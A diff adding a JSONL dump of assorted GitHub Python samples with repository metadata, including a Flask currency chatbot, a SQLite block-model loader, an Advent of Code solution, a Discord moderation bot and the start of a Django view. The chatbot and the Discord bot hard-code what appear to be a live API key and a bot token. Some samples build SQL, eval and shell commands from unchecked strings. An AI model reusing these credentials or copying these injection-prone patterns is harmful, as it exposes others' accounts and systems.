diff --git "a/5005.jsonl" "b/5005.jsonl" new file mode 100644--- /dev/null +++ "b/5005.jsonl" @@ -0,0 +1,1975 @@ +{"seq_id":"71465018705","text":"# n = int(input(\"enter number of rows\"))\nn = 4\ncount = 10\nfor i in range(n+1):\n for j in range(i):\n k = count//2\n print(k,end=\" \")\n k-=1\n\n count-=1\n print()\n ","repo_name":"vivekvinchhi/python-practical-sets","sub_path":"dsa/patterng.py","file_name":"patterng.py","file_ext":"py","file_size_in_byte":195,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71277138067","text":"from psychopy import microphone\nfrom psychopy import event, visual # for key events\n\nmicrophone.switchOn(sampleRate=16000) # do once\n\n# Record for 1.000 seconds, save to mic.savedFile\nmic = microphone.AudioCapture()\nmic.record(1)\nmic.playback()\n\n# Resample, creates a new file discards orig\nmic.resample(48000, keep=False)\n\n# Record new file for 60 sec or until key 'q'\nw = visual.Window() # needed for key-events\nmic.reset()\nmic.record(60, block=False)\nwhile mic.recorder.running:\n if 'q' in event.getKeys():\n mic.stop()","repo_name":"brolim/recovoz","sub_path":"captura/captura_audio.py","file_name":"captura_audio.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"3515484089","text":"# imports\n\nimport re\nimport urllib\nimport nltk\nimport unidecode\nimport pytz\nfrom datetime import datetime\n\n\nfrom flask import Flask, render_template, request\nfrom flask_wtf.csrf import CSRFProtect\n\napp = Flask(__name__)\ncsrf = CSRFProtect()\ncsrf.init_app(app)\n\n\n# define app routes\n@app.route(\"/\")\ndef test():\n return render_template(\"home.html\")\n\n\n@app.route(\"/get\")\ndef get_bot_response():\n question = request.args.get('msg')\n answer = get_answer(question)\n return str(answer)\n\n\ndef current_course():\n url = 'https://www.cnb.cz/cs/financni_trhy/devizovy_trh/kurzy_devizoveho_trhu/denni_kurz.txt?date={0:dd\\.MM\\.yyyy}'\n req = urllib.request.Request(url)\n req.add_header('x-api-key', '45TzSCfYbT9SgA28vSO9rdxQHO3YKML6M4Qi045d')\n response = urllib.request.urlopen(req)\n data = str(response.read()).replace(\"\\\\n\", \"\\n\")\n kurz = re.findall(r'EUR{1}[|]{1}[\\d,]*', data)[0].split(\"|\")[1]\n date = re.findall(r'\\d{2}[.]\\d{2}[.]\\d{4}', data)[0]\n return date, kurz\n\n\ndef get_data(day, month, year):\n today = day + \".\" + month + \".\" + year\n url = 'https://www.cnb.cz/cs/financni-trhy/devizovy-trh/kurzy-devizoveho-trhu/kurzy-devizoveho-trhu/vybrane.txt?od=01.01.' + str(\n year) + '&do=' + today + '&mena=EUR&format=txt'\n req = urllib.request.Request(url)\n req.add_header('x-api-key', '45TzSCfYbT9SgA28vSO9rdxQHO3YKML6M4Qi045d')\n response = urllib.request.urlopen(req)\n data = str(response.read()).split(\"\\\\n\")\n del data[0]\n del data[0]\n del data[len(data) - 1]\n return data\n\n\ndef history_course(count_days=14):\n curr_year = datetime.now().strftime('%Y')\n curr_day = datetime.now().strftime('%d')\n curr_month = datetime.now().strftime('%m')\n data = get_data(curr_day, curr_month, curr_year)\n if len(data) < count_days:\n data = get_data(curr_day, curr_month, str(int(curr_year) - 1)) + data\n data = data[-count_days:]\n ret_data = \"Kurz za poslednich \" + str(count_days) + \" dni:
\"\n for day in data:\n ret_data += day.replace(\"|\", \" \") + ' CZE/EUR
'\n return ret_data\n\n\ndef get_recomendation_data():\n data = history_course(4)\n courses = re.findall(r'\\d*,\\d*', data)\n for it, course in enumerate(courses):\n courses[it] = float(course.replace(\",\", \".\"))\n return courses\n\n\ndef course_recommendation(courses):\n recomendation_by_down = True\n for it in range(len(courses[0:3])-1):\n if courses[it] < courses[it+1]:\n recomendation_by_down = False\n break\n mean = (courses[0] + courses[1] + courses[2]) / 3\n recomendation_by_mean = courses[3] < mean + (10 / 100 * mean)\n recomendation = recomendation_by_down or recomendation_by_mean\n return recomendation, recomendation_by_down, recomendation_by_mean, courses[3], round(mean, 3), \\\n round(courses[0] - courses[3], 3), round(courses[3] - mean + (10 / 100 * mean), 3)\n\n\ndef get_answer(question):\n norm_question = unidecode.unidecode(question.lower())\n if nltk.edit_distance(norm_question, \"jaky je cas?\") < 2:\n now = datetime.now(pytz.timezone('CET'))\n return now.strftime(\"%H:%M:%S\")\n elif nltk.edit_distance(norm_question, \"jaky je kurz eura?\") < 2:\n date, course = current_course()\n return \"Aktualni kurz ke dni \" + date + \" je \" + course + \" CZE/EUR\"\n elif nltk.edit_distance(norm_question, \"jak se jmenujes?\") < 2:\n return \"Jmenuji se Chatbot\"\n elif nltk.edit_distance(norm_question, \"jaka je historie kurzu eura?\") < 2:\n return history_course()\n elif nltk.edit_distance(norm_question, \"doporucujes mi euro?\") < 2:\n data = get_recomendation_data()\n recomendation, recomendation_by_down, recomendation_by_mean, today_course, mean, distance, prah_distance = course_recommendation(data)\n odpoved = \"Ano, kurz eura je dnes doporucen.
\" if recomendation else \"Ne, kurz eura neni dnes doporucovan.
\"\n odpoved += \"Dnesni kurz: %.3f CZE/EUR
\" % today_course\n odpoved += \"Prumer za posledni tři dny: %.3f CZE/EUR
\" % mean\n odpoved += \"Kurz vzrostl za posledni tri dny o %.3f
\" % distance if distance > 0 else \"Kurz klesl za posledni tri dny o %f
\" % abs(\n distance)\n\n if recomendation_by_down:\n odpoved += \"Kurz posledni tri dny pouze klesá.
\"\n else:\n odpoved += \"Kurz posledni tri dny je nestabilni.
\"\n\n if recomendation_by_mean:\n odpoved += \"Kurz se nezvysil o více nez 10 procent z prumeru poslednich tri dni
\"\n odpoved += \"Kurz by se nedal doporucit pokud by vzrostl o %.3f na %.3f CZE/EUR
\" % (\n prah_distance, today_course + prah_distance)\n else:\n odpoved += \"Kurz se zvysil o více nez 10 procent z prumeru za posledni tri dny
\"\n odpoved += \"Kurz by se dal doporucit pokud by klesl o %.3f na %.3f
\" % (\n prah_distance, today_course - prah_distance)\n\n return odpoved\n elif nltk.edit_distance(norm_question, \"help?\") < 2:\n return \"Jaký je čas?
Jaký je kurz?
Jak se jmenuješ
Doporucujes mi euro?
jaka je historie kurzu eura?\"\n else:\n return \"nerozumím\"\n\n\nif __name__ == \"__main__\":\n app.run()\n","repo_name":"JanPodavka/ChatBotproject","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5236,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"24549008416","text":"import os\nimport sqlite3\nimport json\nfrom block import Block\nfrom block_model import BlockModel\nfrom constants import LOADED_MODELS_INFORMATION_FILE_NAME, DB_NAME, MINERAL_GRADES_INFORMATION_FILE_NAME, PRECEDENCE_FILES_PATH\n\n\ndef create_db(db_name=DB_NAME):\n if os.path.isfile(db_name):\n os.remove(db_name)\n sqlite3.connect(db_name)\n\n\ndef get_model_name_from_path(block_model_file_path):\n if \"\\\\\" in block_model_file_path:\n separator = \"\\\\\"\n else:\n separator = \"/\"\n model_name = block_model_file_path.split(separator)[-1].split(\".\")[0]\n return model_name\n\n\ndef retrieve_columns_types(block_model_file_path):\n types = []\n with open(block_model_file_path, \"r\") as blocks:\n first_line = list(blocks)[0].strip().split(\" \")[1:]\n for item in first_line:\n if item.isdigit():\n types.append(\"INT\")\n elif item.replace(\"-\", \"\").isdigit():\n types.append(\"INT\")\n elif item.replace(\".\", \"\").replace(\",\", \"\").replace(\"-\", \"\").isdigit():\n types.append(\"FLOAT\")\n else:\n types.append(\"TEXT\")\n return types\n\n\ndef retrieve_columns_types_from_dict(blocks):\n first_line = list(map(str, list(blocks[0].values())[1:]))\n types = []\n for item in first_line:\n if item.isdigit():\n types.append(\"INT\")\n elif item.replace(\"-\", \"\").isdigit():\n types.append(\"INT\")\n elif item.replace(\".\", \"\").replace(\",\", \"\").replace(\"-\", \"\").isdigit():\n types.append(\"FLOAT\")\n else:\n types.append(\"TEXT\")\n return types\n\n\ndef parse_block_column_types(block):\n parsed_block = []\n block = list(map(str, block))\n for data in block:\n if data.isdigit():\n parsed_block.append(data.strip())\n elif data.replace(\"-\", \"\").isdigit():\n parsed_block.append(data.strip())\n elif data.replace(\".\", \"\").replace(\",\", \"\").replace(\"-\", \"\").isdigit():\n parsed_block.append(data.strip())\n else:\n parsed_block.append(\"\\'{}\\'\".format(data.strip()))\n return parsed_block\n\n\ndef create_table_query(model_name, table_columns, columns_types):\n db_columns = [\"{} INT PRIMARY KEY \".format(table_columns[0])]\n for column_name, column_type in zip(table_columns[1:], columns_types):\n db_columns.append(\"{} {} NOT NULL\".format(column_name, column_type))\n query = \"CREATE TABLE IF NOT EXISTS {}({});\".format(model_name, \",\".join(db_columns))\n return query\n\n\ndef load_block_file(block_model_file_path, table_columns, mineral_grades_info, db_name=DB_NAME,\n models_json=LOADED_MODELS_INFORMATION_FILE_NAME, minerals_json=MINERAL_GRADES_INFORMATION_FILE_NAME):\n try:\n model_name = get_model_name_from_path(block_model_file_path)\n conn = sqlite3.connect(db_name)\n columns_types = retrieve_columns_types(block_model_file_path)\n conn.execute(create_table_query(model_name, table_columns, columns_types))\n conn.commit()\n with open(block_model_file_path, \"r\") as block_file:\n columns_for_query = \",\".join(table_columns)\n for block in block_file:\n block_parsed = \",\".join(parse_block_column_types(block.strip().split(\" \")))\n insert_query = \"INSERT INTO {}({}) VALUES ({})\".format(model_name, columns_for_query, block_parsed)\n conn.execute(insert_query)\n conn.commit()\n dump_model_information_into_json(model_name, table_columns, models_json)\n dump_model_information_into_json(model_name, mineral_grades_info, minerals_json)\n return True\n except sqlite3.IntegrityError:\n return False\n\n\ndef load_block_json(model_name, table_columns, minerals, blocks, db_name=DB_NAME,\n models_json=LOADED_MODELS_INFORMATION_FILE_NAME, minerals_json=MINERAL_GRADES_INFORMATION_FILE_NAME):\n try:\n conn = sqlite3.connect(db_name)\n columns_types = retrieve_columns_types_from_dict(blocks)\n conn.execute(create_table_query(model_name, table_columns, columns_types))\n conn.commit()\n columns_for_query = \",\".join(table_columns)\n for block in blocks:\n block = list(block.values())\n block_parsed = \",\".join(parse_block_column_types(block))\n insert_query = \"INSERT INTO {}({}) VALUES ({})\".format(model_name, columns_for_query, block_parsed)\n conn.execute(insert_query)\n conn.commit()\n dump_model_information_into_json(model_name, table_columns, models_json)\n dump_model_information_into_json(model_name, minerals, minerals_json)\n return True\n except sqlite3.IntegrityError:\n return False\n\n\ndef dump_model_information_into_json(model_name, column_names, json_file_name=LOADED_MODELS_INFORMATION_FILE_NAME):\n with open(json_file_name, 'r') as json_file:\n data = json.load(json_file)\n data[model_name] = column_names\n with open(json_file_name, 'w') as json_file:\n json.dump(data, json_file, sort_keys=True)\n\ndef get_models_information_json(json_file_name=LOADED_MODELS_INFORMATION_FILE_NAME):\n with open(json_file_name) as json_file:\n model_information_json = json.load(json_file)\n return model_information_json\n\n\ndef get_mineral_grades_information_json(json_file_name=MINERAL_GRADES_INFORMATION_FILE_NAME):\n with open(json_file_name) as json_file:\n mineral_grades_information_json = json.load(json_file)\n return mineral_grades_information_json\n\ndef get_model_columns_names(model_name, json_file_name=LOADED_MODELS_INFORMATION_FILE_NAME):\n models_information = get_models_information_json(json_file_name)\n return models_information[model_name]\n\ndef get_available_models(json_file_name=LOADED_MODELS_INFORMATION_FILE_NAME):\n models = get_models_information_json(json_file_name)\n models_names = models.keys()\n return list(models_names)\n\n\ndef check_if_model_exists_in_json(block_model_name, json_file_name=LOADED_MODELS_INFORMATION_FILE_NAME):\n model_information_json = get_models_information_json(json_file_name)\n if block_model_name in model_information_json.keys():\n return True\n else:\n return False\n\n\ndef get_block_model_object(block_model_name, json_file_name=LOADED_MODELS_INFORMATION_FILE_NAME, db_name=DB_NAME, json_mineral_grades_file_name=MINERAL_GRADES_INFORMATION_FILE_NAME):\n if check_if_model_exists_in_json(block_model_name, json_file_name):\n columns = get_models_information_json(json_file_name)[block_model_name]\n columns_query_format = \",\".join(columns)\n conn = sqlite3.connect(db_name)\n cursor = conn.execute(\"SELECT {} FROM {}\".format(columns_query_format, block_model_name))\n blocks = []\n for row in cursor.fetchall():\n blocks.append(Block({attribute: value for (attribute, value) in zip(columns, row)}))\n minerals = get_mineral_grades_information_json(json_mineral_grades_file_name)[block_model_name]\n precedence = load_model_precedence(block_model_name)\n return BlockModel(block_model_name, blocks, columns, minerals, precedence)\n\n\ndef get_column_types_from_block(block_model):\n types = []\n block = block_model.blocks[0]\n for column in block_model.columns:\n if type(block.attributes[column]) == int:\n types.append(\"INT\")\n elif type(block.attributes[column]) == float:\n types.append(\"FLOAT\")\n elif type(block.attributes[column]) == str:\n types.append(\"TEXT\")\n return types\n\n\ndef load_block_model_object(block_model, db_name=DB_NAME, models_json=LOADED_MODELS_INFORMATION_FILE_NAME,\n minerals_json=MINERAL_GRADES_INFORMATION_FILE_NAME):\n columns_types = get_column_types_from_block(block_model)\n\n try:\n conn = sqlite3.connect(db_name)\n conn.execute(create_table_query(block_model.name, block_model.columns, columns_types))\n conn.commit()\n for block in block_model.blocks:\n block_parsed = \",\".join(parse_block_column_types(list(map(str, [block.attributes[column]\n for column in block_model.columns]))))\n columns_for_query = \",\".join(block_model.columns)\n model_name = block_model.name\n insert_query = \"INSERT INTO {}({}) VALUES ({})\".format(model_name, columns_for_query, block_parsed)\n conn.execute(insert_query)\n conn.commit()\n dump_model_information_into_json(model_name, block_model.columns, models_json)\n dump_model_information_into_json(model_name, block_model.minerals, minerals_json)\n return True\n except:\n return False\n\n\ndef load_model_precedence(block_model_name, precedence_path=PRECEDENCE_FILES_PATH):\n filenames = os.listdir(os.path.join(os.getcwd(), precedence_path))\n precedence = {}\n block_model_precedence_file = \"{}.prec\".format(block_model_name)\n for filename in filenames:\n if block_model_precedence_file in filename:\n file = open(os.path.join(os.getcwd(), precedence_path, filename))\n for line in file:\n data = line.strip().split(\" \")\n if data[1] != \"0\":\n precedence[data[0]] = data[2:]\n else:\n precedence[data[0]] = []\n return precedence\n\n\n\n","repo_name":"Vicentecorrea/group_1_2020","sub_path":"load_block_model.py","file_name":"load_block_model.py","file_ext":"py","file_size_in_byte":9414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34227300228","text":"from collections import defaultdict\nfrom enum import IntEnum\nfrom functools import cached_property\nfrom itertools import chain\nfrom typing import DefaultDict, Iterable, Self\n\nCoordinate = tuple[int, int]\n\n\ndef parse_input(path=\"input.txt\") -> list[\"Path\"]:\n paths = []\n with open(path, \"r\") as fp:\n line = fp.readline()\n while line:\n paths.append(\n Path([eval(\"(\" + chars + \")\") for chars in line.split(\" -> \")])\n )\n line = fp.readline()\n\n return paths\n\n\nclass Path:\n def __init__(self, edges: Iterable[Coordinate]):\n self.edges = tuple(edges)\n\n def __repr__(self) -> None:\n return f\"Path({self.edges})\"\n\n @property\n def is_valid(self) -> bool:\n \"\"\"A path is valid iff all its edges have a common row or column connecting them.\"\"\"\n if any(\n start[0] != end[0] and start[1] != end[1]\n for start, end in zip(self.edges[:-1], self.edges[1:])\n ):\n return False\n\n return True\n\n @cached_property\n def coordinates(self) -> Iterable[Coordinate]:\n \"\"\"All the coordinates connecting the edges of the path.\"\"\"\n\n assert self.is_valid\n\n def expand(start: Coordinate, end: Coordinate) -> list[Coordinate]:\n \"\"\"Expands a pair of coordinates into a list of coordinates covering every\n possible coordinate between and including the pair.\n\n \"\"\"\n if start[0] != end[0]:\n return [\n (i, start[1])\n for i in range(min(start[0], end[0]), max(start[0], end[0]) + 1)\n ]\n else:\n return [\n (start[0], i)\n for i in range(min(start[1], end[1]), max(start[1], end[1]) + 1)\n ]\n\n return set(\n chain.from_iterable(\n expand(start, end)\n for start, end in zip(self.edges[:-1], self.edges[1:])\n )\n )\n\n\nclass Entity(IntEnum):\n air = 0\n rock = 1\n sand = 2\n source = 3\n\n\nclass CaveOutOfBoundsError(Exception):\n pass\n\n\nclass CaveCannotAddSandError(Exception):\n pass\n\n\nclass Cave:\n def __init__(\n self,\n source: Coordinate = (500, 0),\n rock_paths: Iterable[Path] = (),\n sand_coordinates: Iterable[Coordinate] = (),\n has_floor: bool = False,\n padding: int = 1,\n ):\n self.source_coordinate = source\n self.sand_coordinates = tuple(sand_coordinates)\n self.rock_paths = tuple(rock_paths)\n self.has_floor = has_floor\n self.padding = padding\n\n def __repr__(self) -> str:\n return (\n \"Cave(\"\n + \",\".join(\n (\n f\"source={self.source_coordinate},\",\n f\"rock_paths={self.rock_paths},\",\n f\"sand_coordinates={self.sand_coordinates},\",\n f\"has_floor={self.has_floor}\",\n f\"padding={self.padding},\",\n )\n )\n + \")\"\n )\n\n def __str__(self) -> None:\n # construct an array of cave entities\n source_x, source_y = self.source_coordinate\n min_x, max_x = self.x_range\n min_y, max_y = self.y_range\n\n ncol = max_x - min_x + 1\n nrow = max_y - min_y + 1\n\n array = [[Entity.air for _ in range(ncol)] for _ in range(nrow)]\n array[source_y - min_y][source_x - min_x] = Entity.source\n for x, y in self.rock_coordinates:\n array[y - min_y][x - min_x] = Entity.rock\n\n for x, y in self.sand_coordinates:\n array[y - min_y][x - min_x] = Entity.sand\n\n # add floor?\n if self.has_floor:\n if max_y == max(\n y for x, y in self.rock_coordinates\n ): # nothing below lowest rock\n array.append([Entity.air for _ in range(ncol)])\n\n array.append([Entity.rock for _ in range(ncol)])\n\n # apply padding to it\n col_pad = [Entity.air for _ in range(self.padding)]\n row_pad = [\n col_pad + [Entity.air for _ in range(ncol)] + col_pad\n for _ in range(self.padding)\n ]\n array = row_pad + [col_pad + list(row) + col_pad for row in array] + row_pad\n\n # convert it to a /graphic/ string\n chars = {\n Entity.air: \".\",\n Entity.rock: \"#\",\n Entity.sand: \"o\",\n Entity.source: \"+\",\n }\n\n return \"\\n\".join(\"\".join(chars[item] for item in row) for row in array)\n\n def __contains__(self, coordinate: Coordinate) -> bool:\n \"\"\"A cave contains a pair of coordinates if they do not designate a position\n above its roof nor below its floor.\n\n \"\"\"\n x, y = coordinate\n min_x, max_x = self.x_range\n min_y, max_y = self.y_range\n if not self.has_floor:\n return min_y <= y\n else:\n return min_y <= y <= self.floor_level\n\n def __getitem__(self, coordinate: Coordinate) -> Entity:\n x, y = coordinate\n if (x, y) not in self:\n raise CaveOutOfBoundsError()\n\n if y == self.floor_level:\n return Entity.rock\n\n return self.grid[x, y]\n\n @cached_property\n def rock_coordinates(self) -> tuple[Coordinate]:\n return tuple(chain.from_iterable(path.coordinates for path in self.rock_paths))\n\n @cached_property\n def x_range(self) -> Coordinate:\n \"\"\"The horisontal range of coordinates in which there is something besides air.\"\"\"\n crds = (\n list(self.rock_coordinates)\n + [self.source_coordinate]\n + list(self.sand_coordinates)\n )\n return min(x for x, y in crds), max(x for x, y in crds)\n\n @cached_property\n def y_range(self) -> Coordinate:\n \"\"\"The vertical range of coordinates in which there is something besides air.\"\"\"\n crds = (\n list(self.rock_coordinates)\n + [self.source_coordinate]\n + list(self.sand_coordinates)\n )\n return min(y for x, y in crds), max(y for x, y in crds)\n\n @cached_property\n def floor_level(self) -> int | None:\n if not self.has_floor:\n return None\n\n return max(y for x, y in self.rock_coordinates) + 2\n\n @cached_property\n def grid(self) -> DefaultDict[Coordinate, Entity]:\n grid = defaultdict(lambda: Entity.air)\n grid[self.source_coordinate] = Entity.source\n for x, y in self.rock_coordinates:\n grid[x, y] = Entity.rock\n\n for x, y in self.sand_coordinates:\n grid[x, y] = Entity.sand\n\n return grid\n\n @cached_property\n def nrock(self) -> int:\n return len(self.rock_coordinates)\n\n @cached_property\n def nsand(self) -> int:\n return len(self.sand_coordinates)\n\n def simulate(self) -> Coordinate | None:\n \"\"\"Simulate a grain of sand falling from the source, return\n the coordinates it will land on.\n\n If the cave has no floor and the grain will continue to fall forever, return\n None.\n\n If it does have a floor, this method will always return a coordinate. Eventually\n returning the coordinate of the source once the cave is filled with sand.\n\n \"\"\"\n _, max_y = self.y_range\n\n def step(x, y) -> Coordinate | None:\n # fallen off?\n if not self.has_floor and max_y < y:\n return None\n\n # down one step\n if self[x, y + 1] == Entity.air:\n return step(x, y + 1)\n\n # down and to the left\n if self[x - 1, y + 1] == Entity.air:\n return step(x - 1, y + 1)\n\n # down and to the right\n if self[x + 1, y + 1] == Entity.air:\n return step(x + 1, y + 1)\n\n return x, y\n\n return step(*self.source_coordinate)\n\n def add_sand(self, x: int, y: int) -> Self:\n \"\"\"Create a new cave with a sand added to the designated position.\"\"\"\n if (x, y) not in self:\n raise CaveOutOfBoundsError()\n\n if self[x, y] in (Entity.rock, Entity.sand):\n raise CaveCannotAddSandError(\n f\"cannot add sand to a position already occupied by a {self[x, y].name}\"\n )\n\n return Cave(\n self.source_coordinate,\n self.rock_paths,\n list(self.sand_coordinates) + [(x, y)],\n self.has_floor,\n self.padding,\n )\n\n def add_floor(self) -> Self:\n return Cave(\n self.source_coordinate,\n self.rock_paths,\n self.sand_coordinates,\n True,\n self.padding,\n )\n\n\nif __name__ == \"__main__\":\n # Part 1\n cave = Cave(rock_paths=parse_input())\n crd = cave.simulate()\n while crd is not None:\n cave = cave.add_sand(*crd)\n crd = cave.simulate()\n\n print(cave)\n print(f\"Grains of sand in floor less cave: {cave.nsand}\")\n\n # Part 2\n cave = cave.add_floor()\n crd = cave.simulate()\n while crd != cave.source_coordinate:\n cave = cave.add_sand(*crd)\n crd = cave.simulate()\n\n cave = cave.add_sand(*cave.source_coordinate)\n print(cave)\n print(f\"Grains of sand in floored cave: {cave.nsand}\")\n","repo_name":"jslofsgaard/AoC","sub_path":"2022/14/regolith_reservoir.py","file_name":"regolith_reservoir.py","file_ext":"py","file_size_in_byte":9316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4387708586","text":"import speech_recognition as sr\r\ndef write_file(text):\r\n f= open('./note.txt','a')\r\n f.write(text)\r\n f.close()\r\nr=sr.Recognizer()\r\nwith sr.Microphone() as source:\r\n print(\"Listening\")\r\n while 1:\r\n audio=r.listen(source)\r\n try:\r\n text=r.recognize_google(audio)\r\n if (text=='class over'):\r\n print('done')\r\n break \r\n print(text)\r\n write_file(\" \"+text)\r\n except:\r\n print('Sorry could not reconize your voice')\r\nprint('notes stored in notes file')","repo_name":"yogeeswar2001/smartNoteMaker","sub_path":"speech_text.py","file_name":"speech_text.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"26867661916","text":"''' File lock mechanism for Cache\n'''\n\n# Standard imports\nimport os, errno, time\n\n# Logger\nimport logging\nlogger = logging.getLogger(__name__)\n\n# Wait until multithread process could acquire lock\ndef waitForLock(filename):\n lockAcquired = False\n while not lockAcquired:\n try:\n f = os.open(filename + \"_lock\", os.O_CREAT | os.O_EXCL | os.O_WRONLY)\n os.close(f)\n lockAcquired = True\n except OSError as e:\n if e.errno == errno.EEXIST: # Failed as the file already exists.\n time.sleep(1)\n else: # Something unexpected went wrong\n logger.error( \"Problem acquiring the lock\" )\n exit(1)\n\ndef removeLock(filename):\n os.system(\"rm \" + filename + \"_lock\")\n","repo_name":"HephyAnalysisSW/TopEFT","sub_path":"Tools/python/lock.py","file_name":"lock.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"43521441306","text":"import os\r\nimport discord\r\nimport datetime\r\nimport asyncio\r\nimport pyjokes\r\nfrom better_profanity import profanity\r\n\r\n\r\n\r\nmessages = joined = 0\r\nchecker=0\r\n\r\njoke = pyjokes.get_joke(\"en\", \"all\")\r\nclient = discord.Client()\r\ntoken = \"OTQ2NDI5NDY4NzkxMTczMTgx.YhelIQ.Ardht6ytzVQpdNlx6osVtknfaOQ\"\r\n\r\n\r\ndef bad_sink(message):\r\n global checker\r\n censored = profanity.censor(message)\r\n if message==censored :\r\n checker=0\r\n else :\r\n checker=1\r\n\r\n\r\ndef ran_joke():\r\n joke = pyjokes.get_joke(\"en\", \"all\")\r\n return joke\r\n\r\n\r\n\r\nasync def update_stats():\r\n await client.wait_until_ready()\r\n global messages, joined\r\n\r\n while not client.is_closed():\r\n try:\r\n with open(\"stats.txt\", \"a\") as f:\r\n f.write(\r\n f\"TIME : {datetime.datetime.now()}, MESSAGES : {messages} ,MEMBERS : {joined}\\n\"\r\n )\r\n\r\n messages = 0\r\n joined = 0\r\n\r\n await asyncio.sleep(600)\r\n\r\n except Exception as e:\r\n print(e)\r\n await asyncio.sleep(600)\r\n\r\n\r\n@client.event\r\nasync def on_ready():\r\n with open(\"stats.txt\", \"a\") as f:\r\n f.write(\r\n f\"We have logged in as {client.user} on {datetime.datetime.now()} \\n\"\r\n )\r\n print(\"BOT IS ONLINE...\")\r\n\r\n\r\n@client.event\r\nasync def on_member_update(before, after):\r\n n = after.nick\r\n if n:\r\n if n.lower().count(\"navodaya\") > 0:\r\n last = before.nick\r\n if last:\r\n await after.edit(nick=last)\r\n else:\r\n await after.edit(nick=\"change ur nick\")\r\n\r\n@client.event\r\nasync def on_member_join(member):\r\n\r\n global joined\r\n joined += 1\r\n\r\n for channel in member.guild.channels:\r\n if str(channel) == \"general\":\r\n await client.send_message(f\"Welcome to the server {member.mention}\")\r\n\r\n\r\n@client.event\r\nasync def on_message(message):\r\n\r\n global messages\r\n messages += 1\r\n id = client.get_guild(946424314423558164)\r\n channels1 = [\"testing\"]\r\n commands = [\"!joke\", \"$help\", \"!details\",\"!coin\",\"!users\",\"$commands\"]\r\n greetings = [\"hi\", \"HI\", \"Hi\", \"HII\", \"Hii\", \"hii\", \"GM\", \"Good\",\"good\", \"Good morning\",\"Hello\"]\r\n admin_commands = [\"!delete all\",\"!delete 20\"]\r\n valid_users = [\"Navodaya#5068\"]\r\n \r\n\r\n\r\n\r\n\r\n\r\n bad_sink(message.content)\r\n if checker==0 :\r\n pass\r\n else :\r\n print (f\"The message was deleted(bad word) {message.content} from {message.author}\")\r\n await message.channel.purge(limit =1)\r\n \r\n \r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n #if str(message.channel) in channels1 and str(message.content) in commands:\r\n if str(message.content) in commands:\r\n\r\n if str(message.content) == \"!users\":\r\n await message.channel.send(f\"TOTAL NO OF USERS : {id.member_count}\")\r\n \r\n elif str(message.content) == \"!joke\":\r\n await message.channel.send(ran_joke())\r\n\r\n elif str(message.content) == \"!coin\":\r\n await message.channel.send('Hello.'or 'helo')\r\n\r\n elif str(message.content) == \"!details\" :\r\n await message.channel.send(\"HELLO! IM FOREVER BOT 1.O,AS MY NAME SAYS I USED TO RUN FOREVER AND I WAS CREATED ON 22.02.2022\")\r\n\r\n elif message.content == \"$help\":\r\n embed = discord.Embed(title=\"HEY HOW CAN I HELP YOU?\",description=\"I CAN HELP BY THESE COMMANDS\")\r\n \r\n embed.add_field(name=\"!users\", value=\"GIVES TOTAL OF USERS\")\r\n embed.add_field(name=\"!joke\", value=\"GIVES A JOKE\")\r\n embed.add_field(name=\"!commands\", value=\"GIVES LIST OF COMMANDS\") \r\n embed.add_field(name=\"!details\", value=\"BASIC INFO ABOUT ME\")\r\n \r\n await message.channel.send(content=None, embed=embed)\r\n\r\n elif message.content == \"$commands\":\r\n embed = discord.Embed(title=\"Commands you can use\",description=\"If you are unable to perform any Commands check your Permissions\")\r\n \r\n embed.add_field(name=\"!users\", value=\"GIVES TOTAL OF USERS\")\r\n embed.add_field(name=\"!joke\", value=\"GIVES A JOKE\")\r\n embed.add_field(name=\"!delete all\", value=\"Delete all message range of 100 [ADMINS]\")\r\n embed.add_field(name=\"!delete 20\", value=\"Delete 20 messages [ADMINS]\")\r\n embed.add_field(name=\"!details\", value=\"BASIC INFO ABOUT ME\")\r\n \r\n await message.channel.send(content=None, embed=embed)\r\n\r\n \r\n content = message.content.lower()\r\n\r\n if message.author == client.user:\r\n return\r\n\r\n if any(greeting in content for greeting in greetings):\r\n return await message.channel.send('Hello,Good to see you :-)')\r\n\r\n if str(message.author) in valid_users:\r\n \r\n if str(message.content) in admin_commands and str(message.content) == \"!delete all\":\r\n \r\n with open(\"history.txt\", \"a\") as f:\r\n f.write(f\"All message was deleted by {message.author} on {datetime.datetime.now()} \\n\") \r\n await message.channel.purge(limit=100)\r\n\r\n elif str(message.content) in admin_commands and str(message.content) == \"!delete 20\":\r\n \r\n with open(\"history.txt\", \"a\") as f:\r\n f.write(f\"20 message was deleted by {message.author} on {datetime.datetime.now()} \\n\") \r\n await message.channel.purge(limit=20)\r\n\r\n \r\n\r\n\r\nclient.loop.create_task(update_stats())\r\nclient.run(token)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"Navodayavarmak/PRO-BOT","sub_path":"ART.PY","file_name":"ART.PY","file_ext":"py","file_size_in_byte":5665,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"73666575184","text":"from django.shortcuts import render , render_to_response\nfrom django.http import HttpResponse\nimport requests\nfrom . models import events\nfrom chatterbot import ChatBot\nfrom chatterbot.trainers import ListTrainer\nimport os\nimport pyttsx3\nimport pythoncom\nfrom vaderSentiment.vaderSentiment import SentimentIntensityAnalyzer\n\ndef index(request):\n\n sympapiurl = 